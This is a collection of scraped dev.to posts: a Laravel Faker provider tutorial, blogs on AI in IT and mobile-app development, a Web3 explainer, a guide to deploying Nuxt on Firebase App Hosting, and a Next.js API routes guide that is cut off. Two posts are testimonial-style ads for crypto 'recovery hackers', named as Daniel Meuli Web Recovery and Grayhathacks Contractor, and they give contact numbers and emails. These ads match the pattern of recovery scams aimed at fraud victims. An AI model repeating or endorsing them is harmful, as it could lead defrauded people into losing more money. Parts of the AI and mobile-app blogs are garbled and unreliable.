1,879,741 | Extending PHP Faker Library to define custom data structures using Laravel 11 | Introduction If you work with Laravel at a daily basis (specially if you apply TDD), you... | 0 | 2024-06-07T00:33:09 | https://dev.to/victormlima98/extending-php-faker-library-to-define-custom-data-structures-using-laravel-11-25lc | laravel, php, faker, testing | ## Introduction
If you work with Laravel at a daily basis (specially if you apply TDD), you might have figured out that during the 'test writing phase', sometimes we face situations that requires us to write custom array structures to fill our models, or some kind of data that cannot be easily faked and had to be written manually inside the Factory class.
Recently I've dealt with [EditorJS](https://editorjs.io/) and had to save the JSON data it provides in my database, so I ended up having to fake some of the data in order to easily make some assertions during testing.
For the following examples, I have a `users` table with a JSON column called `custom_data`.
## The Problem
Many of us end up doing the obvious approach:
```php
$user = User::factory()
->create([
'custom_data' => [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
'second_index' => 'second_value',
'third_index' => 'third_value',
],
'type' => 'very_complex',
],
]);
```
The output of `$user->custom_data` of course is:
```
array:3 [
"id" => "666251e06b701"
"data" => array:3 [
"first_index" => "first_value"
"second_index" => "second_value"
"third_index" => "third_value"
]
"type" => "very_complex"
] // app/Console/Commands/Playground.php:29
```
Or maybe some of us will take a more elegant, but yet sometimes problematic, solution:
```php
$user = User::factory()
->withCustomData()
->create();
```
In `UserFactory.php`:
```php
public function withCustomData(): self
{
return $this->state([
'custom_data' => [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
'second_index' => 'second_value',
'third_index' => 'third_value',
],
'type' => 'very_complex',
],
]);
}
```
And as you may expect, the output is the same as above.
At first glance these examples may seem good enough - at the end of the day, they work - but when we consider that this array can be different sometimes, it can quickly become a cumbersome to maintain. For instance, what if the "type" index has a different value and your application behavior depends on that? Will you pass a different parameter every time? Or even create another factory state, thus making the code larger and larger?
I mean, there is no problem to define factory states, but the thing here is to "separate responsibilities" and make our code smaller and more readable.
The issue with this approach is that the UserFactory has the responsibility of taking care of which types of data (and all data variations) it actually supports, when in reality the users table doesn't care about it. The JSON column accepts anything that is valid, regardless of what it is.
## The Solution
This said, we can agree that nothing better than having a place to generate these exact data variations and complex things with a few lines of code.
For this, we are going to extend the Faker library by creating a custom provider, so we will be able to call:
`$this->faker->complexArray()` or `fake()->complexArray()`
And that will get the job done.
In order to accomplish that, I have written a class inside `Tests/Faker/Providers` namespace, named `CustomComplexArrayProvider.php`
The aim here is to shelter all that logic regarding this specific array and all things that may differ inside it.
In `tests/Faker/Providers`:
```php
<?php
namespace Tests\Faker\Providers;
use Faker\Provider\Base;
class CustomComplexArrayProvider extends Base
{
public function complexArray(): array
{
return [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
'second_index' => 'second_value',
'third_index' => 'third_value',
],
'type' => 'complex',
];
}
}
```
As you can see, we have the `complexArray` method definition and it returns a multidimensional array with 3 indexes. Of course this is a very simple and straightforward example. You can receive parameters inside this method and make it suit your testing needs.
You can even create a method for each type of data, just to make the code more readable:
In `CustomComplexArrayProvider.php`:
```php
public function notTooComplexArray(): array
{
return [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
],
'type' => 'not_too_complex',
];
}
```
Okay, fair enough, but how do we use this?
To access these guys and use them within your tests, we must tell Laravel to add this data Provider in the `Faker/Generator` class.
For that, I've written a Service Provider called `TestServiceProvider`.
> You can generate Provider classes with `php artisan make:provider`
```php
<?php
namespace App\Providers;
use Faker\Factory;
use Faker\Generator;
use Illuminate\Support\ServiceProvider;
use Tests\Faker\Providers\CustomComplexArrayProvider;
class TestServiceProvider extends ServiceProvider
{
public function register(): void
{
if (!$this->app->environment(['local', 'testing'])) {
return;
}
$this->app->singleton(
abstract: Generator::class,
concrete: function (): Generator {
$factory = Factory::create();
$factory->addProvider(new CustomComplexArrayProvider($factory));
return $factory;
}
);
$this->app->bind(
abstract: Generator::class . ':' . config('app.faker_locale'),
concrete: Generator::class
);
}
}
```
Then we have to register the Provider in our application, in `bootstrap/providers.php`:
```php
return [
App\Providers\AppServiceProvider::class,
App\Providers\TestServiceProvider::class,
];
```
As you can see, we registered a binding in the Service Container telling Laravel that it must add our custom class as a Faker provider, so now Faker is aware of the methods we've just created.
And of course, this is intended to be applied only in local/testing environments, so there's a check at the beginning of the code just to avoid this code to run in the production environment.
The `singleton` call aims to allow us to use our custom class when calling them from a `Faker/Generator` object, and the `bind` does the same thing, but when calling from the `fake()` helper.
This way, the result is:
```php
dd(fake()->complexArray());
```
Output:
```
array:3 [
"id" => "6662549ca6be9"
"data" => array:3 [
"first_index" => "first_value"
"second_index" => "second_value"
"third_index" => "third_value"
]
"type" => "complex"
] // app/Console/Commands/Playground.php:37
```
Now you can use this method inside your factories, or even combine them with factory states. That's up to you now.
I hope this article helps you to make your code even easier to understand in 6 months from now 🙌
Thanks for reading! | victormlima98 |
1,879,746 | AI in IT: How Artificial Intelligence Will Transform the IT industry | Let me take you into the past. Remember those days when you used to watch amazing thrilling... | 0 | 2024-06-07T00:30:19 | https://dev.to/liong/ai-in-it-how-artificial-intelligence-will-transform-the-it-industry-3cab | ai, cybersecurity, malaysia, kualalumpur | Let me take you into the past. Remember those days when you used to watch amazing thrilling futuristic movies where the robot always had to be the one to solve the problems present in the IT infrastructure and also to manage it smoothly? These robots are also used to solve many difficult problems like repairing a digital wrist. Am I right? So let me share with you the main thing that is our future that is coming closer day by day due to this modernized world. The era of [Artificial Intelligence](https://ithubtechnologies.com/artificial-intelligence-in-malay/?utm_source=dev.to&utm_campaign=artificialintelligence&utm_id=Offpageseo+2024) (AI), in which Artificial intelligence was playing a role in changing or transforming the IT industry deeply. At that time, this industry is changing itself from the realm of fictional life and the coming into the reality-based world.
But the point here comes: what is AI? and how it is going to impact the IT industry. So, in this blog, you are going to explore the future of AI and the exciting and amazing abilities that AI features hold.
## Demystifying the Machine: A Peek Under the Hood of AI
At the center of the AI, it can be seen that it has the ability to mimic or behave just like human beings. Human beings have cognitive functions like learning deeply and more problem-solving methods. This image of stuff is achieved only if there are many various techniques or strategies including machine learning. The algorithm is the main important thing that analyzes the data and its patterns and automatically gives out predictions afterward. AI then when going into the deepest part of earning, difficult algorithms are used according to the human brain and it processes the vast amount of data and also at last uncovers the toughest patterns.
## The IT Battlefield: Where AI Will Make its Mark
The IT industry is very big as it consists of a vast kind of landscape and AI is working to give a promising mark on the industry by affecting it in many ways. So, I have mentioned some of the main important changes that are done by AI itself in the IT industry. The following are the key transformations that we can easily expect:
- **The Era of Self-Healing Systems:** For example, you need to imagine yourself in a world where there is an IT system that can easily analyze, diagnose, and fix minor or major problems on its own. The AI can easily and smoothly analyze the tools by its very own system, logs, traffic, performance, and also the corrections. All this is to give you the idea that this can be very important to decrease the time and free up most of the IT experts to make them focus on their practical tasks.
- **Cybersecurity on Steroids:** The fight against cyber threats is a constant battle. AI can be a powerful weapon in this war. AI-powered security systems can continuously learn from attack patterns and network behavior, enabling them to detect and respond to threats in real time. This proactive approach can significantly improve an organization's security posture and prevent costly breaches.
- **The Rise of the IT Service Desk Oracle:** The time has come to say goodbye to long waiting times and frustrating non-stop troubleshooting sessions. The problem has come, AI in which the AI-powered chatbots are used to manage basic IT support tasks, answer the customer's queries, resolve specific common issues, and transfer tough problems to human strategies or techniques.
- **Predictive Maintenance:** Think about it when you can get equipment failure before it even starts to happen. AI can easily analyze the sensor that severs the IT infrastructure and predicts more problems and also you need to send maintenance before they cause any certain problems. This kind of approach will automatically save the business time and money.
- **The AI-Powered Developer:** The AI-powered developers cannot relate to the original developer's experts but they can be amazing partners for sure. As these partners are regularly giving us coding tasks, suggesting our code to finish, and much more. This will allow the IT industry to be more productive and organized.
## Beyond the Hype: The Human Element in the AI Equation
However, AI has proven to us many incredible advantages but it's very important to remember that these are not good to some extent. You should know that these AIs are just tools that can never teach any human being. The power of AI lies in the hands of AI and Human brain intelligence. Many IT experts play important roles in designing, planning out, and checking AI systems. They also have expertise in data management, cybersecurity, and problem-solving is the success of AI.
## The Road Ahead: Challenges and Considerations
These are some of the key drawbacks or challenges that are faced when AI enters the IT industry infrastructure.e The following key reams involve the:
1. **Data, Glorious Data:**
AI is thriving on data. Many organizations need their infrastructure and processes in place to collect, store, and manage vast amounts of data that are needed to run in AAI systems.
2. **The Honorable Dilemma:**
Any small problem in the data can cause biased AI system formation. So, it's very important to make sure that AI algorithms are developed and used honestly.
3. **The Human Factor:**
The AI changes very human tasks and does it automatically. However at this point has replaced jobs and caused an increased amount of unemployment. The reskilling of IT systems needs to adapt to the transforming landscape.
## Conclusion: Embracing the AI Revolution
According to the above-highlighted points, it can be stated that AI entering the IT industry has changed the total IT infrastructure. but we should take this more positively to adapt to the AI features and also to unlock the world of billions of possibilities. So, the next time you think of AI, don't just imagine robots taking over the world – you just imagine a future where humans and AI work together to create a more strong, efficient, secure IT landscape.
| liong |
1,879,745 | RECOVER SCAMMED BITCOIN WITH THE HELP OF DANIEL MEULI WEB RECOVERY | I am truly grateful to have come across Daniel Meuli Web Recovery during a time when I was feeling... | 0 | 2024-06-07T00:26:04 | https://dev.to/markrooney43/recover-scammed-bitcoin-with-the-help-of-daniel-meuli-web-recovery-1gb5 | I am truly grateful to have come across Daniel Meuli Web Recovery during a time when I was feeling hopeless and lost after falling victim to a Ponzi scheme. It seemed like all hope was lost, and I had resigned myself to the fact that I would never be able to recover the 213,000 pounds I had invested in BTC. The scammers had left me in a state of despair, with my money locked away in an improper profile that prevented me from making any withdrawals. However, everything changed when I stumbled upon a testimonial from someone who had successfully recovered their BTC with the help of Daniel Meuli Web Recovery. Reading about their positive experience gave me hope, and I decided to reach out to Daniel Meuli Web Recovery for assistance. I was amazed by the professionalism and efficiency of their team from the very beginning. They were responsive, and understanding, and most importantly, they were able to deliver results. I was so relieved when Daniel Meuli Web Recovery informed me that they had successfully recovered a significant amount from the scammers. It was a huge weight off my shoulders, and I felt like a huge burden had been lifted off my chest. The fact that they could recover much more than I had expected was truly a blessing, and I couldn't be more grateful for their services. Daniel Meuli Web Recovery is truly a trustworthy and reliable hacking service that I would recommend to anyone in need of recovery assistance. Their expertise and dedication to helping victims of scams are truly commendable, and I am so thankful that I found them when I needed help the most. They have restored my faith in humanity and have shown me that there are still honest and trustworthy individuals out there who are willing to help others in need. I want to thank God for guiding me to Daniel Meuli Web Recovery and for allowing me to share my experience with others. If you ever find yourself in a similar situation or need assistance recovering your funds from scammers, do not hesitate to contact Daniel Meuli Web Recovery. They are the best in the business, and I am living proof of their exceptional services. They gave me the tools and support to reclaim my life. WhatsApp> +393 512 013 528 Website> https://danielmeulirecoverywizard.online Telegram> @ Danielmeuli | markrooney43 | |
1,879,744 | Apps: Your Pocket-Sized Toolkit for Success | Welcome fellow readers! Let's talk about the most common and important part of our lives known as... | 0 | 2024-06-07T00:19:59 | https://dev.to/liong/apps-your-pocket-sized-toolkit-for-success-1d1k | mobileapps, testing, malaysia, kualalumpur | Welcome fellow readers! Let's talk about the most common and important part of our lives known as mobile applications. Have you ever thought about how all those awesome games and programs we use on our phones get made? In this blog, you are going to get a brief and knowledgeable idea about [mobile application development](https://ithubtechnologies.com/mobile-application-development/?utm_source=dev.to&utm_campaign=mobileapplicationdevelopment&utm_id=Offpageseo+2024) and what kind of stages are involved in it.
## Destroying Your Pocket: A Dip into Mobile App Development
**Imagine this:** Suppose that you get an idea and that idea leads to the creation of a unique and amazing mobile app. Your idea is very unique, impressive, and innovative, and can transform and change the ways people interact and communicate in the digital kind of world. But here at this point, you have to be quicker in catching the idea of the app.
Today modernized digital means that the majority of the people, kids, or children are fond of using mobile applications so much mobile apps are the ones that have the main power in their hands and. but this idea can only be made practically if it is brought to life. Now whenever you have an idea you need to grab the opportunity and start to work on it until and un; ess it has entered the reality of life. my fellow readers and innovators, my point is to make you clear that your plan needs some polishing and this also gives us an idea about the main magic of mobile application development.
## The App Frontier: What is Mobile App Development?
In simple words, it can be stated that mobile application development is a method or steps that are involved in creating applications that easily run on your smartphones, computer devices, PCs, and other mobile phones. The apps are not limited to whether they are gaming apps, social media apps like (Instagram, Snapchat, Facebook, and Whatsapp), or whether these apps are cooking-related. Mobile apps can be of every type and variety so the major key here is to ensure that these mobile apps are created carefully and accurately by the mobile application developers. The mobile app's capacity and abilities are not limited at all.
## Building Your Ideal App: The Development Process
The main idea here is to explain to you that whatever type and variety of apps you make you need to know the development process. the main development stages or steps that are needed in the creation of your dream app. The developing method is not like painting up on plain canvas and putting down the code but the developing process is about important stages. Each of the stages plays its very own important part in making sure that the app is perfect and best to work.
1. **Planning:**
This may include that your vision or idea has come to life here at this point. You need to first give the idea of what the app proposes, what kind of audience to reach out to and what kind of experience you want to have for the series. All these aspects must be listed down as a mindmap in your mind when doing the main planning of your app. Then, brainstorm with your friends or colleagues. At least, get more suggestions and ideas, mind maps, and more features to make your app top and stand out.
2. **Designing the User Interface (UI) and User Experience (UX):**
The designing of the UI/UX design is the major part that makes your website to be more visually stunning and that more users or individuals come in day by day. The best and greatest UI/UX design from the looks and feels makes the app more attractive. The touch of UI design includes buttons, screens, and an overall appealing look while the UX design comes in which includes the smooth and enjoyable part of pp. This whole story is not about just aesthetics but this is also about the user journey while experiencing the scroll tap and every swipe.
3. **Action:**
Now, the action part comes in which is the coding. Here the coding begins! The use of different programming languages is being done and used for different platforms – for example, Java or Kotlin for Android, Swift or Objective-C for iOS. Here, developers bring your design and functionalities to life, line by line very accurately; ly and carefully.
4. **Testing and Quality Assurance (QA):**
The testing part is the ending part of the development process in which the polishing is done by your app ID. They test every feature of the app to confirm whether there are glitches or bugs. present inside the application. They introduce some unknown people to you during the testing method and through their actions they ensure that the app is nice and delivers the best experience.
## Why Mobile App Development Rocks: A Look at the Benefits
Additionally, mobile apps are very awesome if we start to focus on their benefits and the way they are helping people throughout their everyday lives. S buckle up because the benefits of mobile app development are plentiful! These benefits wi; give you an idea of how mobile application development is helping businesses.
- **Increased Customer Engagement:** Apps beautifully give a direct line of customers. When the notifications come, these push notifications keep us fully informed about the line of customers. These push notifications give the customers details about sales or promotions programs and automatically this creates great engagement.
- **Brand Building and Recognition:** A well-designed app acts as your brand ambassador to help your brand strengthen the base of your brand and do its branding. so in the end this will make a more visible presence of our brand through the mobile app.
- **Improved Customer Service:** Apps can offer features like live chat support, FAQs, or self-service options. These features are best for allowing customers to get help whenever they need it.
- **Increased Sales and Earnings:** The apps can boot up your brand by boosting its sales. so more visibility means more sales and at least more revenue or profit. And you can enhance your skill set as a developer.
## The Final Verdict: Is Mobile App Development Right for You?
According to the above-highlighted points, it can be concluded that your business is surviving and needs more expansion so that it can reach more audiences than your option is mobile application development. Worry not, because I have given you your ultimate solution.
| liong |
1,879,743 | REVIEW OF THE BEST BITCOIN RECOVERY TEAM - GRAYHATHACKS CONTRACTOR | I can't help myself but give a glowing review of this team of gray hat hackers I recently hired. It... | 0 | 2024-06-07T00:19:16 | https://dev.to/austin_gasper_760f9b92a76/review-of-the-best-bitcoin-recovery-team-grayhathacks-contractor-4ki9 | I can't help myself but give a glowing review of this team of gray hat hackers I recently hired. It is the least I could do, all things considered. I remember how devastated I was when I was scammed into investing in a Bitcoin trading broker. I wouldn't wish that to happen even to my worst enemy. Despite my many years of trading experience and careful due diligence, I was still fell for that well orchestrated scam. At first everything seemed to check out. I invested approximately $150,000 to purchase Bitcoin and transferred it to their platform, completely unaware that I was making the biggest mistake in my life.
When I tried to get back some of the funds I Invested and failed after several attempts that is when it dawned on me that my money was gone. Their phony customer support also proved to be useless and only wasted my time acting like they were helping while actually doing nothing. For weeks I cried myself to sleep after It became clear that I had been scammed. I felt like a fool and i was utterly hopeless. I was angry but at the same time so vulnerable and depressed.
That's when I read about Grayhathacks Contractor. There were numerous and mostly good reviews about them helping other people in similar predicaments like mine. I had some hope and I reached out to them, desperate for help. Their professionalism and understanding immediately put me at ease. The team at Grayhathacks went above and beyond to track and recover my stolen Bitcoin. Even as I say that I'm still in shock that they actually kept and fulfilled their promise. Their expertise in dealing with blockchain technology and cryptocurrency scams was evident from the start. They used advanced tools and techniques to trace my funds and identify the fraudulent brokers. Within a few weeks, they managed to recover a significant portion of my investment. The relief I felt was indescribable, I cannot even put it in words.
Grayhathacks was just heaven sent. I hired them out of sheer desperation but to be honest I was very skeptical. What they were able to do for me is nothing short of magic. One of the major pros of using Grayhathacks Contractor is their expertise in dealing with various types of cyber fraud and scams. They have a dedicated team of professionals who are skilled in tracking and recovering stolen assets. Their success rate is unmatched, and they are committed to helping victims like me regain their lost funds.
I highly recommend Grayhathacks to anyone who has experienced a similar ordeal. Their swift action, combined with their deep knowledge and understanding of cryptocurrency scams, makes them the best choice for recovering lost investments. If you find yourself in a situation where your assets have been compromised, don't hesitate to reach out to them. Their expertise and dedication can make a world of difference. Contact them on: Email: grayhathacks@contractor.net
WhatsApp +1 (843) 368-3015

| austin_gasper_760f9b92a76 | |
1,879,742 | Web3: The Future of the Internet | Introduction: Web3, also known as Web 3.0, is the envisioned future of the World Wide Web,... | 0 | 2024-06-07T00:17:26 | https://dev.to/sam15x6/web3-the-future-of-the-internet-1jfp | web3, webdev, blockchain, ai |
## Introduction:
Web3, also known as Web 3.0, is the envisioned future of the World Wide Web, promising to revolutionize the way we use the internet. It is a concept that builds upon the foundations of decentralized technologies, blockchain, and community-driven ideals to create a new, open, and user-controlled online experience. With Web3, the internet is anticipated to undergo a significant transformation, offering users greater control, ownership, and opportunities in the digital world.
## Understanding Web3:
Web3, or Web 3.0, represents the third generation of internet development and usage. The first generation, Web 1.0, was characterized by static web pages and limited user interaction. Web 2.0, the current iteration, is defined by dynamic content, user-generated material, and centralized platforms like social media and sharing economy giants.
Web3, as the next evolutionary step, aims to address the shortcomings of Web 2.0, particularly concerning data ownership, privacy, and the concentration of power in the hands of a few tech giants. Web3 envisions a decentralized web where users are not just consumers but also owners and stakeholders of the online platforms and communities they engage with.
## Key Characteristics of Web3:
- **Decentralization**: Web3 is built on the principle of decentralization, meaning there is no central authority or intermediary controlling the network. Instead, it relies on distributed ledger technologies like blockchain to facilitate peer-to-peer interactions and transactions. This decentralization ensures greater user privacy, security, and freedom from censorship.
- **User Ownership and Control**: In Web3, users own and control their data, content, and digital assets. They have the ability to decide how their information is shared, used, and monetized. This shift empowers individuals to have a financial stake in the web communities they participate in and to benefit directly from their contributions.
- **Blockchain Integration**: Blockchain technology is at the heart of Web3, enabling secure, transparent, and tamper-proof transactions. Blockchain also facilitates the use of cryptocurrencies and NFTs (non-fungible tokens), which are integral to the Web3 economy. Smart contracts, enabled by blockchain, allow for trustless and automated transactions, reducing the need for intermediaries.
- **Community and Collaboration**: Web3 emphasizes community-driven development and governance. Users actively participate in shaping the platforms and applications they use, often through decentralized autonomous organizations (DAOs). This collaborative approach empowers users to have a say in the direction of their online communities and the features they value.
- **Semantic Web**: Web3 incorporates the concept of the semantic web, where data is given well-defined meanings, enabling better understanding and interpretation by machines. This enhances search capabilities, knowledge generation, and problem-solving, making the web more intelligent and contextually aware.
- **Advanced App Interfaces**: Web3 will usher in more advanced and multidimensional app interfaces. For example, a mapping service could not only provide location search but also offer route planning, lodging suggestions, and real-time traffic updates, all within a single platform.
## Benefits of Web3:
- **Enhanced Privacy and Security**: By removing central points of failure and control, Web3 reduces the risk of data breaches and enhances user privacy. Blockchain technology further secures user information and transactions.
- **Greater User Control**: Web3 gives users the power to control their digital lives, including their data, content, and online identities. This control extends to monetization opportunities, allowing users to directly benefit from their online activities.
- **Incentivized Participation**: Web3 encourages active participation and contribution to online communities. Users can be incentivized through various mechanisms, such as token rewards, governance rights, or direct financial gains, fostering a more engaged and invested user base.
- **Open and Accessible**: Web3 technologies are designed to be open and accessible to all, lowering barriers to entry and promoting inclusivity. This democratization of the web has the potential to unlock innovation and creativity on a global scale.
## Challenges and Criticisms:
While Web3 offers a promising vision for the future of the internet, it also faces several challenges and criticisms.
- **Adoption and Usability**: One of the key challenges for Web3 is widespread adoption and making these technologies user-friendly. Blockchain and cryptocurrency, for instance, are still considered complex and intimidating by many, requiring a shift in user understanding and behavior.
- **Regulatory and Legal Issues**: The decentralized nature of Web3 presents regulatory challenges, particularly concerning governance, taxation, and legal jurisdictions. Establishing clear frameworks for these new online communities and economic models will be essential.
- **Centralization Concerns**: Despite the decentralized ideals of Web3, there are concerns about the potential for centralization within certain platforms or blockchain networks. This could lead to the creation of new gatekeepers and power structures, undermining the very principles Web3 aims to uphold.
- **Environmental Impact**: The energy consumption and environmental impact of blockchain technology, particularly proof-of-work consensus mechanisms, have been criticized. As Web3 gains traction, addressing these concerns through more sustainable practices will be crucial.
## Conclusion:
Web3 represents a significant shift in the way we conceive of and interact with the internet, offering a decentralized, user-owned, and community-driven vision for the future. While challenges and uncertainties remain, the potential benefits of Web3 are vast, promising a more open, secure, and equitable online experience. As we move forward, it is essential to carefully consider the implications of this new web paradigm and work towards realizing its positive potential while mitigating the risks and challenges along the way. | sam15x6 |
1,863,442 | Yes. You can deploy Nuxt on Firebase App Hosting (2024) | Firebase team just announced, at Google I/O 2024, a new product to deploy fullstack web app: Firebase... | 0 | 2024-06-07T00:12:46 | https://dev.to/rootasjey/yes-you-can-deploy-nuxt-on-firebase-app-hosting-2024-44bd | tutorial, nuxt, firebase, webdev | Firebase team just announced, at [Google I/O 2024](https://youtu.be/qyhdKb8liEA), a new product to deploy fullstack web app: [Firebase App Hosting](https://firebase.google.com/docs/app-hosting?authuser=1).
Previously we had [Firebase Hosting](https://firebase.google.com/docs/hosting) which was only suitable for frontend apps:
* Types : Static Site, SPA Single Page App
* Frameworks : Vue.js, React.js, Svelte, Flutter web.
But we couldn't deploy fullstack apps (using SSR, ISR) with Firebase Hosting. It was possible to workaround this limitation using Firebase Functions. I tried it and it was not easy nor pleasant:
* There was a latency due to warm-up functions
* You have to configure the functions to serve the content (which is an additional step specific to Firebase Hosting)
Today, with Firebase App Hosting, this became a lot more easier.
Since Firebase team didn't explicitly tell if it was possible to deploy applications other than Angular and Next.js, I took the journey to deploy a Nuxt app using SSR.
<br />
**TL;DR: It's working!**
<br />
I'll assume that you have the necessary toolings to develop a Nuxt app. You need:
- [Node.js](https://nodejs.org/) installed - v18.0.0 or newer
- [A terminal](https://warp.dev/): in order to run Nuxt & Firebase commands
- A Text editor: like [VSCode](https://code.visualstudio.com/)
- [Git](https://git-scm.com/) and a [GitHub](https://github.com/) account
(create an account if you don't already have one)
I'm using macOS with Node.js v20.13.1 (lts/iron), VSCode with the [official Vue extension](https://marketplace.visualstudio.com/items?itemName=Vue.volar), [bun](https://bun.sh/) v1.1.8.
I'll name the project nuxt-firebase. Feel free to replace that name with your your own.
<br />
<br />
## Create a Nuxt app
Let's create a Nuxt app with minimal code and SSR configuration. Than we will deploy it on the cloud.
<br />
<br />
### Initialize the repository
[(You can follow the official Nuxt documentation there).](https://nuxt.com/docs/getting-started/installation)
{% embed https://www.loom.com/share/ebfe93c5dcf04aa1897ddd3c80998153?sid=43a2aa94-1106-40aa-b9cd-4fe45bd6e9da %}
<br />
First, initialize a repository with Nuxt:
```bash
# initialize your nuxt app
npx nuxi@latest init nuxt-firebase
```
We then navigate into the created directory:
```bash
# move into your project directory
cd nuxt-firebase
```
Run the app to check that everything is okay:
```bash
# in your nuxt project directory
npm run dev -- -o
```
<br />
### Add pages and routes
We're going to edit the app.vue file and add two pages inside the /pages/ directory which does not exist yet.
{% embed https://www.loom.com/share/22d2476442ec4834a58ac5d0b316b5fb?sid=f2fdc398-54f1-4e6d-84fc-02c156da36f2 %}
Replace the content of app.vue with this one:
```vue
// app.vue
<template>
<NuxtLayout>
<NuxtPage />
</NuxtLayout>
<footer>
<div class="link-bar">
<NuxtLink to="/">Home</NuxtLink>
<NuxtLink to="/about">About</NuxtLink>
</div>
</footer>
</template>
<style>
footer {
position: fixed;
bottom: 24px;
display: flex;
justify-content: center;
align-items: center;
left: 0;
right: 0;
padding: 10px;
text-align: center;
}
.link-bar {
display: flex;
justify-content: center;
gap: 1rem;
padding: 0.5rem;
border-radius: 0.5rem;
border: 1px solid #FFE6E6;
box-shadow: 0 0 10px #FFE6E6;
position: relative
}
</style>
```
Create the `/pages/` folder at the root of your project's directory. Inside, add these two files:
**index.vue:**
```vue
// pages/index.vue
<template>
<h1>Index</h1>
</template>
```
**about.vue:**
```vue
// pages/about.vue
<template>
<h1>About</h1>
</template>
```
You should see something like this in your browser:

It's very basic. You can customize your pages but for our demo it's good enough.
<br />
### Configure Rendering Modes
By default, Nuxt uses SSR in development mode, but switches to client-side rendering in production (for example, static rendering).
We need to configure our app routes to explicitly tell Nuxt to use SSR for our pages in `nuxt.config.ts`:
```ts
// nuxt.config.ts
// --------------
// https://nuxt.com/docs/api/configuration/nuxt-config
export default defineNuxtConfig({
devtools: { enabled: true },
routeRules: {
'/': { ssr: true },
'/about': { ssr: true },
},
})
```
Now when we'll deploy our app on Firebase App Hosting, the routes `/` and `/about` will be serve through server side rendering (SSR).
For our own knowledge, here is an example of a config rendering rules with their purpose:
```ts
// nuxt.config.ts
export default defineNuxtConfig({
routeRules: {
// Homepage pre-rendered at build time
'/': { prerender: true },
// Products page generated on demand, revalidates in background, cached until API response changes
'/products': { swr: true },
// Product page generated on demand, revalidates in background, cached for 1 hour (3600 seconds)
'/products/**': { swr: 3600 },
// Blog posts page generated on demand, revalidates in background, cached on CDN for 1 hour (3600 seconds)
'/blog': { isr: 3600 },
// Blog post page generated on demand once until next deployment, cached on CDN
'/blog/**': { isr: true },
// Admin dashboard renders only on client-side
'/admin/**': { ssr: false },
// Add cors headers on API routes
'/api/**': { cors: true },
// Redirects legacy urls
'/old-page': { redirect: '/new-page' }
}
})
```
An overview of routes rendering rules:

Source: https://nuxt.com/docs/guide/concepts/rendering#route-rules
See the official documentation for more information: https://nuxt.com/docs/guide/concepts/rendering
<br />
## Push into GitHub
The final part in the code editor is to push the new code to [GitHub](https://github.com/). Thus Firebase will be able to fetch and build our app with its CI/CD.
{% embed https://www.loom.com/share/701d8dac81444ac7b203bf0a24d9f08e?sid=99495d57-4973-44e1-9a24-e13b57a610fa %}
You can see the source code here: [nuxt-firebase](https://github.com/rootasjey/nuxt-firebase)
<br />
## Deploy on Firebase App Hosting
First we need to [create a Firebase account](https://firebase.google.com/) if we don't have one. After your Firebase account has been created, you should see the welcome screen. Click on the "Create a project" button:
{% embed https://www.loom.com/share/3e6540357efa4e97ae0fb02ce2fa7c7c?sid=73011a55-422d-4021-bf25-e371a5872bc7 %}
Once created, we go on le left side bar and select "App Hosting".
You can follow the video tutorial or/and the screen by screen images with text explanations:
{% embed https://www.loom.com/share/c5a2f777651a44c786ff0b9f23e2a22b?sid=cd269e94-e8f3-4c23-8adb-ea843a41ec12 %}
App Hosting button is in the Build accordion:

We arrive on the App Hosting welcome page:

We need to upgrade our project from Spark Plan to Blaze Plan.
Our Nuxt app uses features in the Blaze Plan so we have to add a payment method. For this demo we'll pay little to nothing since our app won't consume much resources, if it has minimal traffic. Firebase products pricing - including App Hosting - is based on usage cost. Meaning that if your app get approximately 10k visits, you'll pay ~$0.15 according to the [Firebase documentation](https://firebase.google.com/docs/app-hosting/costs).

NOTE: This is an example and other factors should be taken into account like: Effective Concurrency, CPU/Mem Time.
Plus there are no-cost limits which allow us to use these resources for free before being charged:

After clicking on the "Upgrade project" button, a popup opens:

Click on "Continue".

We confirm our country, and enter a payment method.
Your account is now setup on the Blaze plan, now we can go to our dashboard and create a new **App Hosting** project (which will be inside our Firebase project: nuxt-firebase).
Click on "Get started" button.

The configuration wizard will ask us to create access from our GitHub account to Google Developer Connect, which will be then linked to Firebase.

When this is done, we will be able to select our GitHub account and Nuxt app (hosted on GitHub).
Wait some minutes for the app to build. At this time, the build time is much longer than Vercel. It takes ~45 seconds on Vercel and ~3 minutes on Firebase App Hosting.
And voilà! If the build and deployment succeeded, a new link is generated with a SSL certificate. It may took some time (in minutes or hours) for the link to be functional.

You can visit the deployed [Nuxt app this new url](https://nuxt-firebase--nuxt-firebase-1f646.us-central1.hosted.app/).
The source code is on [GitHub](https://github.com/rootasjey/nuxt-firebase).
## Sources
* [Nuxt documentation](https://nuxt.com/docs/getting-started/installation)
* [Google I/O - Introducing Firebase App Hosting](https://youtu.be/qyhdKb8liEA?si=Fm0BohXjKZA7O93w)
* [Firebase App Hosting documentation](https://firebase.google.com/docs/app-hosting) | rootasjey |
1,878,706 | Simplest guide to Next.js APIs | What Makes Next.js APIs So Special? I'm assuming you know what APIs are. APIs are an... | 0 | 2024-06-07T00:12:41 | https://dev.to/joeskills/simplest-guide-to-nextjs-apis-204g | api, nextjs, webdev, simple | ## What Makes Next.js APIs So Special?
I'm assuming you know what APIs are. APIs are an important part of developing functional web apps. Next.js has introduced the feature to create route handlers for APIs since version 9.0 in 2019. There are lots of ways to build a separate backend (like Ruby, PHP, Express.js, Django, etc.) other than Next.js, _**so why even do it in Next.js?**_.
##It might not be that great
By default, Next.js route handlers use serverless functions, which means in some cases you might have **cold starts**, **high cost for scaling**, and **vendor lock-in** since it requires serverless platforms like Vercel to work properly. It also has **limitations when it comes to using complex middleware,** unlike a library like Express.js, which was meant to be used for routing on a server.
## But it's not that bad
But most of these issues are automatically taken care of by Vercel (which provides amazing **caching & optimization** strategies) and **serverless functions can be scalable and cost-effective** if done properly. Here are some more benefits of using Next.js as both your frontend and backend:
- **Hot reloading:** This means when developing, you get the same hot reload features as your frontend for your API routes, which makes development faster.
- **Consistency of your codebase:** It greatly simplifies development by keeping the frontend and backend logic in the same place.
- **File-based routing**: API routes use a simple file-based routing system that easily integrates into your Next.js project structure.
- **No additional setup:** There's no need to configure additional middleware or create a separate server.
- **Simplication:** It has built-in features to simplify common tasks when developing your API.
#API routes in the Next.js app router
The app router uses a **file-based routing system** that starts from the `app` directory. You can **mirror URL paths by defining API routes in a nested folder structure**. By doing this, you create _Node.js serverless functions that act as API endpoints_.
```
app/
└── api/
